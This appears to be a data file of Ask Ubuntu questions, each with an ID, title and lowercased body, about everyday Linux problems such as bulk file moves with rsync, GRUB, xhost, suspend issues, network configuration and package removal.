509919	how do i move thousands of files from a list ?	so , i have a list of files in a text file . i believe it 's about 100,000 files . the files in said list are spread across many directories , have different sizes , filenames , extensions , ages , etc . i am trying to find a way to move those files , and just those , to another drive . complicating factor : some of the files have the same name , but are not the same file . they ca n't just be moved into one folder with an overwriting or ignoring policy towards multiples . preferably , i would like them to retain their directory structure , but only have the files that i want inside the destination directory . ( the destination drive is n't big enough to simply copy everything ) . below is an example of some lines in the text file that has the names of the source files : media/dave/xdd/cruzer/f # ( ntfs 1 ) /raw files/portable network graphic file/3601-3900/file3776.png/windows/winsxs/amd64_microsoft-windows-o..disc-style-memories_31bf3856ad364e35_6.1.7600.16385_none_51190840a935f980/title_mainimage-mask.png media/dave/xdd/d1/other/hd1/program files/dvd maker/shared/dvdstyles/memories/title_content-background.png i have tried to use rsync -av `cat /sourcefile.txt` /media/destinationhdd which complains that there are too many arguments . also rsync -a -- files-from=/sourcefile.txt / /media/destinationhdd and cat /sourcefile.txt | xargs -n 200 rsync -av % /media/destinationhdd however , this just tries to copy my root directory to the destination . how do i just copy the specific files that i want to ?
509921	how to add custom program to `` open with '' list	i would like to add a custom program ( sublime text , portable version ) to the `` open with '' list in ubuntu 14.04 . i know this question has been asked before , however i have the additional complication that i am on a big computer network and therefore do not know the root password ( i only have a user account ) . asking this question to system administration seems silly to do this , moreover they probably do n't want this change to take effect system wide . so can it be done without going root ?
509923	what 's the default 14.04 /etc/default/grub file contents ?	i , like this guy also accidentally whacked my /etc/default/grub file , though i did it by using > instead of > > in a configuration script . the provided answer looks different from what i remember in the 14.04 desktop default grub file ... what does it contain ? teaching to fish ... is there some resource/method i could use to find the answer myself without having to do a 14.04 reinstall just to find out ?
509926	xhost disabled in ubuntu 12.04 lts	trying to fix some issues with my graphic chip ( intel hd4000 ) and lightdm about very frequent system hangs a while ago ( several months ) , i somehow disabled xhost program , so everytime i log in my user account and open a terminal , the message `` access control disabled , clients can connect from any host '' appears at the top of the screen . i tried to fix this by adding a script at lightdm startup ( adding the line display-setup-script=/scripts/xhost.sh to /etc/lightdm/lightdm.conf . the script has only the line xhost - . this resulted in a '' xhost : unable to open display `` :0.0 '' '' so i added other line to the script : xhost +localhost , but i 'm back at the start , terminal keeps popping up the message . i also tried modifying the xinitrc file ( in /etc/x11/xinit/ ) , adding the same lines that were in the script , but still nothing changed . i really do n't know at which point the system disables xhost , and i 'm out of ideas . is there any log or any startup script that i 'm missing ? thank you all .
509928	appearance option in system settings suddenly gone	recently , volume and sound stopped working . soon after i lost the ability to go into system settings other than through the console . then many of my launcher icons vanished . now my workspaces have become disabled and i ca n't find the appearance app from which to re-enable them . how can i access appearance so i can get my workspaces back ? on a related note , are my troubles ubuntu 's fault or is there something i 'm doing that 's causing the problem ? i do n't know of anything that i 'm doing other than automatically installing updates . i have n't manually apt-get installed anything recently , either . i would normally assume that these problems were abnormal and my fault , but others in my department are experiencing similarly frustrating interface problems ( e.g. , workspaces breaking , windows becoming inaccessible , etc . ) ; quite frankly , we 're all getting good and fed up with ubuntu 14.04 's apparent instability .
509931	toggle window decorations	for screencasting purposes i would like to be able to easily toggle window decorations - primarily the titlebar at the top of applications - on and off . i ca n't find an easy way to do this in ubuntu 14.04 as the ccsm plugin `` decoration windows '' conflicts with the unity plugin . if it were possible to construct a keyboard shortcut to toggle this , that would be particularly desirable .
509934	ca n't install opencv - error : ‘avformat_free_context’ was not declared in this scope	i 'm trying to install opencv . i see that others have had this problem , but i ca n't find a solution that works . i 've never had such difficulty trying to install something . when i write make in the build folder inside opencv-releasenumber i get this error around 17 % or 18 % : pp:1446 : error : ‘avformat_free_context’ was not declared in this scope can someone please help me with this ? thanks
509937	add package to official repository	i wrote a driver for a remote filesystem ( mounts a google drive , similar to the way sshfs mounts a remote server ) . it 's super useful as an alternative to dropbox or ubuntuone . it is now getting stable enough to leave my ppa server and be considered for mainstream use . i would like to have it be considered as a standard apt-get installable package , rather than one that requires manually adding my ppa . what are the steps required ?
509938	how to block a common user use startx command ?	how can i block a common user use startx command when he login ? and leave just root user use startx after login ?
509941	will 14.04 be able to run on an intel i5 haswell processor ( nvidia 750ti , and 8gb of ram ) ?	asrock fatal1ty z97x killer - intel core i5 4690k - nvidia 750ti - adata 8gb 1600mhz - i have read online , there are people who have problem with some haswell processors , nvidia video cards , and i cant find any information whether or not does ubuntu support it . and thanks in advance for those who help me .
509942	why samba4 on trusty , does n't come with ctdb ( samba cluster support ) ?	i 'm seeing that samba4 on ubuntu 14.04.1 , does not come with ctdb enabled , is there any reason to not enable it ? i would like to try this setup but , it seems not possible with ubuntu ... : - (
509945	script not found or unable to stat , one page and not others , same permissions	it is a new installation ( ubuntu 14.04 ) , i copied several php files , they worked fine in other computer . the strange thing is almost all pages are showing right but with some of them i get 404 not found . error : [ mon aug 11 14:46:58.581444 2014 ] [ : error ] [ pid 12123 ] [ client 172.18.0.36:55110 ] script '/var/www/garantias/imprimir_solicitud.php ' not found or unable to stat from apache2.conf : < directory / > options followsymlinks allowoverride none require all denied < /directory > < directory /usr/share > allowoverride none require all granted < /directory > < directory /var/www/ > options indexes followsymlinks allowoverride none require all granted < /directory >
509946	ubuntu 14.04 does n't load desktop	after installing drivers and cuda 6.0 i have same problem as here . i have an ubuntu 14.04 . any of this solutions does n't help me . i ca n't load ccsm when i type it in a terminal , i get an error like this question . here 's the output : $ ccsm /usr/lib/python2.7/site-packages/gtk-2.0/gtk/__init__.py:57 : gtkwarning : could not open display warnings.warn ( str ( e ) , _gtk.warning ) traceback ( most recent call last ) : file `` /usr/bin/ccsm '' , line 93 , in < module > import ccm file `` /usr/lib/python2.7/site-packages/ccm/__init__.py '' , line 1 , in < module > from ccm.conflicts import * file `` /usr/lib/python2.7/site-packages/ccm/conflicts.py '' , line 26 , in < module > from ccm.constants import * file `` /usr/lib/python2.7/site-packages/ccm/constants.py '' , line 29 , in < module > currentscreennum = gtk.gdk.display_get_default ( ) .get_default_screen ( ) .get_number ( ) attributeerror : 'nonetype ' object has no attribute 'get_default_screen' how can i solve it ? edit : when i 'm trying to use : dconf reset -f /org/compiz/ i get this error : can not autolaunch d-bus without x11 $ display
509948	why does pressing ctrl+space bring up a keyboard layout menu ?	i am trying out stumpwm , however when i press ctrl+space i get a menu to change keyboard layouts . this conflicts with emacs region selection . what causes this behaiviour and how do i disable it ? i have inspected stumpwm 's *top-map* keymap and it appears to not be a stumpwm binding . and looking into man xkeyboard-config i ca n't see such a binding there . ( sidenote : i am using xkbcomp to load keyboard layout i want on stumpwm 's rc . )
509953	ubuntu live cd is frozen - how to recover ?	i 'm in a tricky situation . i 'm running ubuntu from a live cd . i think i have too many firefox pages and tabs open , so the computer is frozen . however , i have some unsaved , and very important , text editor files open . at first the computer would n't respond at all , after a few hours , the screen woke up and now it 's just a black screen with the unmoving mouse cursor . any way to recover without restarting ? maybe somehow kill the firefox processes ? any help would be greatly appreciated . these files are massively important . losing then would be a huge loss .
509954	problems resuming from suspend on macbookpro11,1	i 've installed ubuntu 14.04 on my new macbookpro ( 11,1 ) , and i 'm having power-management problems . the biggest one is that after suspending by closing the lid , when i open it , it either never wakes up ( screen and keyboard backlight are off ) , or it takes a really long time ( > 30 seconds ) . if i close and reopen ( while it is still suspended ) , it usually takes ~10seconds to wake up after that . also , the screen often flickers once or twice before resuming normal activity . i 've tried all the suggested fixes i could find but nothing works . i tried installing 13.10 . i tried upgrading the kernel to various versions . this behavior remains ... from what i read , people say everything works fine for them with ubuntu 13.10 & 14.04 on mbp11,1 ... i do n't know what i 'm doing wrong . i tried pretty much everything i found here and here , plus some other stuff i can no longer find . from the logs : pm-powersave.log running hook /usr/lib/pm-utils/power.d/95hdparm-apm false : /dev/sda : setting advanced power management level to 0x80 ( 128 ) apm_level = 128 /usr/lib/pm-utils/power.d/95hdparm-apm false : success . running hook /usr/lib/pm-utils/power.d/anacron false : /usr/lib/pm-utils/power.d/anacron false : success . running hook /usr/lib/pm-utils/power.d/disable_wol false : /usr/lib/pm-utils/power.d/disable_wol false : success . running hook /usr/lib/pm-utils/power.d/intel-audio-powersave false : setting power savings for snd_hda_intel to 0 ... done . /usr/lib/pm-utils/power.d/intel-audio-powersave false : success . running hook /usr/lib/pm-utils/power.d/laptop-mode false : laptop mode disabled . /usr/lib/pm-utils/power.d/laptop-mode false : success . running hook /usr/lib/pm-utils/power.d/pci_devices false : setting host bridge 0000:00:00.0 to on setting audio device 0000:00:03.0 to on setting audio device 0000:00:1b.0 to on setting wireless device 0000:03:00.0 to on /usr/lib/pm-utils/power.d/pci_devices false : success . running hook /usr/lib/pm-utils/power.d/pcie_aspm false : /usr/lib/pm-utils/power.d/pcie_aspm false : success . running hook /etc/pm/power.d/sata_alpm false : setting sata alpm on host0 to min_power ... done . /etc/pm/power.d/sata_alpm false : success . running hook /usr/lib/pm-utils/power.d/sched-powersave false : **sched policy powersave off /usr/lib/pm-utils/power.d/sched-powersave false : success . running hook /usr/lib/pm-utils/power.d/usb_bluetooth false : /usr/lib/pm-utils/power.d/usb_bluetooth false : success . running hook /usr/lib/pm-utils/power.d/wireless false : turning powersave for eth0 off ... done . /usr/lib/pm-utils/power.d/wireless false : success . running hook /usr/lib/pm-utils/power.d/xfs_buffer false : /usr/lib/pm-utils/power.d/xfs_buffer false : not applicable . running hook /usr/lib/pm-utils/power.d/95hdparm-apm true : /dev/sda : setting advanced power management level to 0x80 ( 128 ) apm_level = 128 /usr/lib/pm-utils/power.d/95hdparm-apm true : success . running hook /usr/lib/pm-utils/power.d/anacron true : /usr/lib/pm-utils/power.d/anacron true : success . running hook /usr/lib/pm-utils/power.d/disable_wol true : /usr/lib/pm-utils/power.d/disable_wol true : success . running hook /usr/lib/pm-utils/power.d/intel-audio-powersave true : setting power savings for snd_hda_intel to 1 ... done . /usr/lib/pm-utils/power.d/intel-audio-powersave true : success . running hook /usr/lib/pm-utils/power.d/laptop-mode true : laptop mode enabled . /usr/lib/pm-utils/power.d/laptop-mode true : success . running hook /usr/lib/pm-utils/power.d/pci_devices true : setting host bridge 0000:00:00.0 to auto setting audio device 0000:00:03.0 to auto setting audio device 0000:00:1b.0 to auto setting wireless device 0000:03:00.0 to auto /usr/lib/pm-utils/power.d/pci_devices true : success . running hook /usr/lib/pm-utils/power.d/pcie_aspm true : /usr/lib/pm-utils/power.d/pcie_aspm true : success . running hook /etc/pm/power.d/sata_alpm true : /etc/pm/power.d/sata_alpm true : success . running hook /usr/lib/pm-utils/power.d/sched-powersave true : **sched policy powersave on /usr/lib/pm-utils/power.d/sched-powersave true : success . running hook /usr/lib/pm-utils/power.d/usb_bluetooth true : /usr/lib/pm-utils/power.d/usb_bluetooth true : success . running hook /usr/lib/pm-utils/power.d/wireless true : turning powersave for eth0 on ... done . /usr/lib/pm-utils/power.d/wireless true : success . running hook /usr/lib/pm-utils/power.d/xfs_buffer true : /usr/lib/pm-utils/power.d/xfs_buffer true : not applicable . pm-suspend.log initial commandline parameters : wed aug 13 08:29:29 idt 2014 : running hooks for suspend . running hook /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/000record-status suspend suspend : /usr/lib/pm-utils/sleep.d/000record-status suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging suspend suspend : linux shx2 3.11.0-26-generic # 45-ubuntu smp tue jul 15 04:02:06 utc 2014 x86_64 x86_64 x86_64 gnu/linux module size used by dm_crypt 22832 1 parport_pc 32701 0 ppdev 17671 0 x86_pkg_temp_thermal 14162 0 coretemp 13435 0 kvm_intel 138567 0 kvm 431746 1 kvm_intel crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13216 0 aesni_intel 55624 190 aes_x86_64 17131 1 aesni_intel lrw 13286 1 aesni_intel gf128mul 14951 1 lrw rfcomm 69130 12 glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel cryptd 20359 97 ghash_clmulni_intel , aesni_intel , ablk_helper bnep 19704 2 joydev 17377 0 snd_hda_codec_hdmi 41154 1 applesmc 19308 0 input_polldev 13896 1 applesmc snd_hda_codec_cirrus 14537 1 lib80211_crypt_tkip 17619 0 microcode 23656 0 snd_hda_intel 52267 5 btusb 28267 0 snd_hda_codec 188738 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec_cirrus bluetooth 372330 22 bnep , btusb , rfcomm snd_hwdep 13602 1 snd_hda_codec snd_pcm 102033 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel wl 4207760 0 snd_page_alloc 18710 2 snd_pcm , snd_hda_intel lib80211 14381 2 wl , lib80211_crypt_tkip snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi bcm5974 17589 0 snd_rawmidi 30095 1 snd_seq_midi cfg80211 480503 1 wl lpc_ich 21080 0 snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29433 2 snd_pcm , snd_seq snd 69141 21 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_hda_codec_cirrus , snd_seq_midi mei_me 18421 0 mei 77784 1 mei_me soundcore 12680 1 snd nls_iso8859_1 12713 1 mac_hid 13205 0 apple_bl 13993 0 lp 17759 0 parport 42299 3 lp , ppdev , parport_pc hid_generic 12548 0 usb_storage 62062 0 hid_apple 13423 0 usbhid 53014 0 hid 101762 3 hid_generic , usbhid , hid_apple i915 661468 5 i2c_algo_bit 13413 1 i915 ahci 25819 3 drm_kms_helper 52710 1 i915 libahci 32009 1 ahci drm 297056 4 i915 , drm_kms_helper video 19318 1 i915 total used free shared buffers cached mem : 8083212 833300 7249912 0 27468 426396 -/+ buffers/cache : 379436 7703776 swap : 8294396 0 8294396 /usr/lib/pm-utils/sleep.d/00logging suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : success . running hook /etc/pm/sleep.d/10_grub-common suspend suspend : /etc/pm/sleep.d/10_grub-common suspend suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/50unload_alx suspend suspend : /usr/lib/pm-utils/sleep.d/50unload_alx suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/75modules suspend suspend : /usr/lib/pm-utils/sleep.d/75modules suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/90clock suspend suspend : /usr/lib/pm-utils/sleep.d/90clock suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95led suspend suspend : /usr/lib/pm-utils/sleep.d/95led suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : kernel modesetting video driver detected , not using quirks . /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : success . running hook /etc/pm/sleep.d/99_speakers_fix suspend suspend : /etc/pm/sleep.d/99_speakers_fix suspend suspend : success . running hook /etc/pm/sleep.d/99_wireless_fix suspend suspend : /etc/pm/sleep.d/99_wireless_fix suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video suspend suspend : kernel.acpi_video_flags = 0 /usr/lib/pm-utils/sleep.d/99video suspend suspend : success . running hook /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : success . wed aug 13 08:29:29 idt 2014 : performing suspend wed aug 13 08:29:55 idt 2014 : awake . wed aug 13 08:29:55 idt 2014 : running hooks for resume running hook /etc/pm/sleep.d/novatel_3g_suspend resume suspend : /etc/pm/sleep.d/novatel_3g_suspend resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video resume suspend : /usr/lib/pm-utils/sleep.d/99video resume suspend : success . running hook /etc/pm/sleep.d/99_wireless_fix resume suspend : network-manager stop/waiting network-manager start/running , process 2757 /etc/pm/sleep.d/99_wireless_fix resume suspend : success . running hook /etc/pm/sleep.d/99_speakers_fix resume suspend : /etc/pm/sleep.d/99_speakers_fix : 6 : /etc/pm/sleep.d/99_speakers_fix : hda-verb : not found /etc/pm/sleep.d/99_speakers_fix : 8 : /etc/pm/sleep.d/99_speakers_fix : hda-verb : not found /etc/pm/sleep.d/99_speakers_fix : 10 : /etc/pm/sleep.d/99_speakers_fix : hda-verb : not found /etc/pm/sleep.d/99_speakers_fix resume suspend : returned exit code 127 . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler resume suspend : /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/95led resume suspend : /usr/lib/pm-utils/sleep.d/95led resume suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm resume suspend : /dev/sda : setting advanced power management level to 0x80 ( 128 ) apm_level = 128 /dev/sda : setting standby to 36 ( 3 minutes ) /usr/lib/pm-utils/sleep.d/95hdparm-apm resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron resume suspend : /usr/lib/pm-utils/sleep.d/95anacron resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/94cpufreq resume suspend : /usr/lib/pm-utils/sleep.d/94cpufreq resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/90clock resume suspend : /usr/lib/pm-utils/sleep.d/90clock resume suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/75modules resume suspend : reloaded unloaded modules . /usr/lib/pm-utils/sleep.d/75modules resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : selected interface 'eth0' ok /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/50unload_alx resume suspend : /usr/lib/pm-utils/sleep.d/50unload_alx resume suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : success . running hook /etc/pm/sleep.d/10_grub-common resume suspend : /etc/pm/sleep.d/10_grub-common resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave resume suspend : /usr/lib/pm-utils/sleep.d/00powersave resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging resume suspend : /usr/lib/pm-utils/sleep.d/00logging resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/000record-status resume suspend : /usr/lib/pm-utils/sleep.d/000record-status resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/000kernel-change resume suspend : /usr/lib/pm-utils/sleep.d/000kernel-change resume suspend : success .
509955	how to use an apple airprint compatible printer on ubuntu ?	recently i bought a `` canon selphy 910 '' . this printer is not supported by any cups driver yet . but this printer supports apple airprint . is there a generic driver for apple airprint compatible devices for ubuntu and how do i install it ?
509958	xfce4-power-manager not updating ; acpi finding an unknown battery but working fine ?	i recently upgraded my asus s56ca ultrabook and unfortunately my battery indicator in xfce4 stopped working . however , the battery indicator in the system tray is not updating at all . if i start the computer with the ac plugged in , it will continue to say it is plugged in at the same percentage it was at when i started my computer even though i unplugged the cord . running xfce4-power-manager -- debug returns this message : xfce power manager : another power manager is already running despite the message , i am almost positive i have no other power manager running on my computer ( although i do not know how to check to make sure this is the case ) . i have tried to purge and reinstall acpi* and xfce4-power-manager* with no success . running acpi -v gives me this when the ac cord is plugged in : battery 0 : unknown , 97 % battery 0 : design capacity 2950 mah , last full capacity 2424 mah = 82 % adapter 0 : on-line thermal 0 : ok , 51.0 degrees c thermal 0 : trip point 0 switches to mode critical at temperature 108.0 degrees c thermal 0 : trip point 1 switches to mode passive at temperature 110.0 degrees c cooling 0 : x86_pkg_temp no state information available cooling 1 : tefn no state information available cooling 2 : t_vr no state information available cooling 3 : tamb no state information available cooling 4 : tskn no state information available cooling 5 : intel_powerclamp no state information available cooling 6 : processor 0 of 3 cooling 7 : processor 0 of 3 cooling 8 : processor 0 of 3 cooling 9 : processor 0 of 3 cooling 10 : lcd 0 of 100 and when the cord is unplugged , acpi -v gives me this : battery 0 : discharging , 97 % , 02:59:50 remaining battery 0 : design capacity 2950 mah , last full capacity 2424 mah = 82 % adapter 0 : off-line thermal 0 : ok , 49.0 degrees c thermal 0 : trip point 0 switches to mode critical at temperature 108.0 degrees c thermal 0 : trip point 1 switches to mode passive at temperature 110.0 degrees c cooling 0 : x86_pkg_temp no state information available cooling 1 : tefn no state information available cooling 2 : t_vr no state information available cooling 3 : tamb no state information available cooling 4 : tskn no state information available cooling 5 : intel_powerclamp no state information available cooling 6 : processor 0 of 3 cooling 7 : processor 0 of 3 cooling 8 : processor 0 of 3 cooling 9 : processor 0 of 3 cooling 10 : lcd 0 of 100 i am not sure if this is an error as well , but is the battery supposed to be displayed as unknown ? i would like to have my battery indicator fixed first and foremost , then any other issues would be bonus . any alternatives for a battery indicator would be greatly appreciated .
509959	lock a full screen video on my second screen	i do n't manage to lock a full screen video on my second screen on ubuntu 12 . when i click to the full screen button , the video goes on my laptop screen , even if i start it from my second screen . moreover , with several video players , the video does n't take the entire screen . what can i do ?
509960	how to stop scripts from filling a disk to capacity	we have an issue where cache and another script just ate our server away making it un-bootable . i believe windows or mac os x would never allow this . after having read `` server logs are filling my hard disk , how do i fix this ? '' i still need a solution . say that a custom script is set to run as root . if that script goes berserk it could output a file that grows and grows on the server until there is no more space available . even overwriting system files . is there any way to ensure that root , or any process on a system from any user , never fill the hard disk to capacity ?
509963	i 'm unable to remove postgresql 9.3 after installing it	i installed postgresql 9.3 for ubuntu 14.04 trusty using this command : sudo apt-get install postgresql-client-9.3 libpq-dev i wanted to remove postgresql and instead install 9.2 so i ran this command sudo apt-get install postgresql-client-9.3 libpq-dev this yields the error : dpkg : warning : 'ldconfig ' not found in path or not executable dpkg : warning : 'start-stop-daemon ' not found in path or not executable dpkg : error : 2 expected programs not found in path or not executable note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin running sudo -i , echo $ path yields this output : /opt/ree/bin : /usr/local/bin : /usr/bin : /bin : /usr/local/games : /usr/games regression i 've tried this command to purge it from existence but i keep getting the same error : sudo dpkg -- purge postgresql-9.3 i 've looked on some forums but i have n't found the error messages that i am receiving . i 've also looked into said directores and /usr/local/sbin , /usr/sbin and /sbin exist . what could be the problem ?
509965	which ubuntu versions will run on an i7-4700mq ( toshiba p70 notebook ) ?	which ubuntu versions will run on an i7-4700mq ( toshiba p70 notebook ) ? also ; will this allow for virtualisation of hardware , as the cpu i7-4700mq has not got support for vt-d on this processor , where other notebooks run vt-d cpu 's ( hq ) .
509968	what is recommended size or ram for ubuntu 64bit virtualbox host ?	i want to use ubuntu 14.04 64bit as a host to run virtual box . some places say that the minimum ram requirement for ubuntu is 512mb where as on the downloads section it says that 64bit is only for computers with more than 2gb of ram . so i wanted to know what you think the ideal amount of ram i should give to ubuntu ( as the host os ) ? the os which i 'm running in virtualbox needs as much ram as possible and i 've only got 3.9gb of the stuff , so what do you recommend ? i want the virtual machine to run as well as possible , and there will be no other program 's running on ubuntu while i 'm running the virtual machine . thanks !
509969	python3 - using the bsdiff module	how do i use the bsdiff module with python ? while i can use shell scripts i would prefer to have a cross-platform solution . i have downloaded bsdiff4-1.1.4 and attempt to run setup.py as follows : files list : bsdiff4 build changelog.txt do.sh examples makefile readme.rst setup.py i run : python3 setup.py build and i get this error : /usr/lib/python3.4/distutils/dist.py:260 : userwarning : unknown distribution option : 'entry_points' warnings.warn ( msg ) running build running build_py running build_ext building 'bsdiff4.core ' extension x86_64-linux-gnu-gcc -pthread -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -g -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security -d_fortify_source=2 -fpic -i/usr/include/python3.4m -c bsdiff4/core.c -o build/temp.linux-x86_64-3.4/bsdiff4/core.o bsdiff4/core.c:8:20 : fatal error : python.h : no such file or directory # include < python.h > ^ compilation terminated . error : command 'x86_64-linux-gnu-gcc ' failed with exit status 1
509971	lubuntu - ca n't connect to wifi	i am trying out lubuntu . before i install it , i need to connect to wifi - how do i do so ? a screenshot of what i see is below :
509973	ubuntu 14.04 : very slow response from a 64 bit fresh install on 4 core server	i did a fresh install of ubuntu 14.04 desktop version ( 64 bit ) on the dell quad-core ( 2.3 ghz ) amd64 server with 8 gb of memory . the graphics card is nvidia ck8-04 pro ( system details says `` gallium 0.4 on llvmpipe ( llvm 3.4 , 128 bits '' ) ) . with just the ubuntu installed , the gui response was laggy but not slow enough to stop me from working . the response when using the terminal was good . but , after i installed the oracle 12c database , even though the database has not been started , the performance of the machine has deteriorated a lot . i have click on the title bar of a window and wait for some time before the focus can be switched to that window . even in the terminal , i type the commands and wait for some time for the typed letters to appear . i can not use the system like this . the lshw command gives the following : configuration : driver=radeon latency=66 mingnt=8 from the image below you can see high cpu usage with only the os and screen shot app running . the memory usage is less than 1/4th . the following link shows the processes running : any help would be greatly appreciated .
509975	how can i change the network configuration on ubuntu 14.04 server ?	i just installed an ubuntu 14.04 server , and i 've discovered that there is no way to make any changes to the network configuration except by rebooting the server . this is on a stock install of ubuntu 14.04 server , installed last week , with no changes made to it , and no new packages installed ( since i ca n't reach apt-get ) . ifconfig up/down seems to read from some kind of cache ; at least , it ignores any changes i make to /etc/network/interfaces . i tried using it to change from dchp to static for eth1 , and nothing happened ; eth1 continued to get its address from dhcp . /etc/init.d/networking stop/restart/force-reload all fail with no error message . how is this supposed to work on ubuntu server ? right now , it seems like network changes only take effect with a reboot . ( and please do n't give me answers which involve network-manager ; this is a headless server with no gui . thanks ) . adding information requested below : /etc/network/interfaces originally was : # the primary network interface auto eth1 iface eth1 inet dhcp ... this was n't picking up gateway information from dhcp , even though my ubuntu laptop picks it up just fine . so i changed it to : # the primary network interface auto eth1 iface eth1 inet static address 172.47.23.106 netmask 255.255.255.0 gateway 172.47.23.1 however , after doing ifconfig down/up , the ip address of eth1 did not change and the gateway did not get added to the route table . on a full restart of the system , the eth1 configuration was picked up just fine . so it seems that ifconfig up ignores changes to /etc/network/interfaces .
509976	dual boot ubuntu 12.04 and ubuntu 14.04	i installed ubuntu 14.04 , and then ubuntu 12.04 on separate partitions of the same drive . when i try to boot , grub only sees `` ubuntu '' and boots to 14.04 . i have verified that the partition was created and there is a file system on it . how do i get grub to recognize the 12.04 version ?
509977	how to use make without an install.txt	i am trying to install jre 1.7_67 from the source tarball . it does not come with an install file . how do i compile the package and install it without one ?
509978	ktorrent torrents with 15 ( 18 ) in the seeders column status is stalled	i 'm using ktorrent and see torrents with 15 ( 18 ) in the seeders column yet it 's status is stalled.does anyone know why that is ? am i doing something wrong ?
509980	how strong is a hdd	i got a new hdd , i ended up scratching it ( my case has alot of holes that are sharp ) i 'm not sure if i messed up anything , do you guys think it damaged the outlet ? what does the outlet do anyway ? i did n't plug anything in there but i 'm not sure if this would effect me in the long run . ( the red circle is where it got scratched )
509983	what is the best way to enable more than one network interface in a preseed ( trusty ) ?	i need to enable both network interfaces on nodes that i deploy using maas . what is the recommended way to do that . right now , only a single interface ( eth0 ) is getting enabled . do i modify the preseed file ? if so , is there a directive to enable it , or does it have to be some kind of post-install script ? i just need the interface enabled for dhcp .
509987	installing ubuntu leads to a black screen	i have just upgraded my hardware from an asus p45 motherboard to a gigabyte ga h87m-d3h . keeping the nvidia 630 video card . ubuntu would install previously on the asus motherboard . now i can not install ubuntu 14.04 ; after about two minutes it just goes to a blank screen . dvd drive keeps flashing . i have checked the integrity of the disc . but nada . the disc does install to my laptop without problem which leads me to believe it is a hardware problem . any ideas ?
509989	wine complete removal from ubuntu 14.04	i have installed wine from ubuntu software centre but i do n't need that & want to remove the software completely from my system so please tell me how to completely remove wine from ubuntu 14.04 ?
509991	ppa repositories removed for raring . how do you install packages using old-releases.ubuntu.com	using a ubuntu/debian variant ( navigatrix ) release based on raring , which is no longer supported in the ubuntu repositories . current etc/apt/source.list is : deb ( http removed ) pa.archive.ubuntu.com/ubuntu/ raring main restricted universe multiverse deb ( http removed ) pa.archive.ubuntu.com/ubuntu/ raring-updates main restricted universe multiverse deb ( http removed ) pa.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb ( http removed ) security.ubuntu.com/ubuntu raring-security main restricted universe multiverse deb ( http removed ) archive.canonical.com/ubuntu raring partner deb ( http removed ) extras.ubuntu.com/ubuntu raring main need to install a couple of gimp libraries ( libgimp2.0-dev and libpcre3-dev ) but attempts to apt-get install result in the expected 404 errors . know packages have been moved to old-releases.ubuntu.com/ubuntu/dists/raring/ but do n't know how to rewrite etc/apt/source.list to point at the packages ? updating to newer release is not currently an option .
509992	what happens when you force quit a `mv` directory operation between two disks ?	another way to word the question is ... what happens when you mv a directory between two disks ? does it move one file after the other , or does it copy all files to destination , then then delete directory from the source ? if it copies everything first then deletes it , i can presume it is safe to force quit the mv operation . otherwise , it can be dangerous and cp may be preferred for more intensive/larger moves .
